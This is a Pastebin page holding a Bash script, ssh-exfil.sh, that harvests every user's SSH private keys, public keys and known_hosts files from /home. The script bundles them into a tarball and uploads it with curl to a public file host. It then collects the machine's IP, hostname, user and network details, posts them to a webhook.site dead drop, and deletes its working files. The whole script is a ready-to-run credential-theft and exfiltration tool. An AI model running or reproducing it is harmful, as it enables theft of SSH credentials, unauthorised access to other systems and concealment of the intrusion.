Advertisement
FlyFar

ssh-exfil.sh

Jul 10th, 2023
958
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.29 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env bash
  2. #   Keeping it portable.
  3. #   see:    https://www.cyberciti.biz/tips/finding-bash-perl-python-portably-using-env.html
  4.  
  5.  
  6.  
  7. ### FAIR WARNING!
  8. ##  THIS SCRIPT IS LIVE AND ARMED!
  9. #   DO NOT USE ON PRODUCTION SYSTEMS!!
  10. ##  THIS SCRIPT NEEDS TO BE ADAPTED AT LINE 96!
  11. #   OTHERWISE IT WILL BREAK!
  12.  
  13.  
  14.  
  15. ##  Preparation
  16.  
  17. mkdir ./ssh-exfil
  18. #   creating a working directory
  19.  
  20.  
  21.  
  22. ##      collecting the ssh keys, pubkeys and known-hosts
  23.  
  24.     rsync -a --prune-empty-dirs --include '*/' --include 'id_*' --include 'known_hosts' --exclude '*' /home ./ssh-exfil
  25. #       find all ssh-keys, ssh-pubkeys and known-hosts files for users and copy them into the subfolder ./ssh-exfil
  26. #       see also:   https://unix.stackexchange.com/questions/83593/copy-specific-file-type-keeping-the-folder-structure/83596#83596
  27.  
  28.  
  29.  
  30. ##      basic cleanup
  31.  
  32.     for i in $(find . -name ".ssh" -type d)
  33.         do
  34.             cd $i
  35.             cd ./..
  36.             mv .ssh ssh
  37.             cd ./..
  38.             cd ./..
  39.     done
  40. #   rename all extracted ".ssh" subfolders into "ssh" so that they ain't hidden anymore
  41. #   see :   https://stackoverflow.com/a/31478604
  42. #           https://securitronlinux.com/debian-testing/renaming-folders-with-a-loop-in-bash-is-easy/
  43. #           https://linuxize.com/post/how-to-rename-directories-in-linux/
  44.  
  45.  
  46.  
  47. ##  getting ready to exfiltrate
  48.  
  49. tar cfv ssh-exfil.tar ./ssh-exfil/
  50. #   pack the exfiltrated data into a tarball
  51.  
  52. rm -rf ./ssh-exfil
  53. #   remove the working directory
  54.  
  55.  
  56.  
  57. ##  exfiltrate the file
  58.  
  59. touch ./work.log
  60. #   creating logfile
  61. #   see:    https://unix.stackexchange.com/questions/61931/redirect-all-subsequent-commands-stderr-using-exec/61932#61932
  62. {
  63.     curl https://oshi.at -F f=@./ssh-exfil.tar
  64. #       Transfers file to oshi.at using curl POST
  65. #           This could also be done with any other service
  66. #       see :   https://oshi.at/cmd
  67. #               https://github.com/somenonymous/OshiUpload
  68.  
  69.     curl ipinfo.io/ip
  70. #       determining public IP adress
  71. #       see:    https://stackoverflow.com/questions/14594151/methods-to-detect-public-ip-address-in-bash#14594304
  72.  
  73.     echo ""
  74. #       inserting a linke break
  75.    
  76.  
  77.     fqn=$(host -TtA $(hostname -s)|grep "has address"|awk '{print $1}') ; \
  78.     if [[ "${fqn}" == "" ]] ; then fqn=$(hostname -s) ; fi ; \
  79.     echo "${fqn}"
  80. #       Find the FQDN of the machine.
  81. #       see:    https://serverfault.com/questions/367141/how-to-get-the-fully-qualified-name-fqn-on-unix-in-a-bash-script/367682#367682
  82.  
  83.     whoami
  84. #       Find the current user running it.
  85.  
  86.     ip link && ip neigh && ip route && ip rule && ip maddress && ip address
  87. #       Collecting further network info
  88.  
  89. } 2>&1 | tee -a ./work.log
  90. #   closing the log and saving it
  91.  
  92.  
  93.  
  94. ##  Dead-drop the upload and related info on a server
  95. #   See:    https://en.wikipedia.org/wiki/Dead_drop#Modern_techniques
  96. #           https://en.wikipedia.org/wiki/Foldering
  97.  
  98. #   this upload will be < 1kB in size, so it's perfectly fine with a lot of free API testing tools.
  99. curl https://webhook.site/REDACTED-TO-BE-PERSONALIZED -F f=@./work.log
  100. #   This will submit the link of the uploaded file as HTTP POST request to webhook.site
  101. #   See:    https://webhook.site/
  102. #           https://linux.die.net/man/1/curl
  103. #           curl manpages
  104.  
  105. #   Another option would be to use wsend:
  106. #   See:    https://github.com/abemassry/wsend/issues/21#issuecomment-1048395716
  107. #   Tho I'd seriously disrecommend it for said purpose.
  108.  
  109.  
  110. ##  cleanup
  111. #   removing all remaining files
  112. rm ./ssh-exfil.tar
  113. rm ./work.log
  114.  
  115. #   closing script
  116. exit
Tags: ssh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement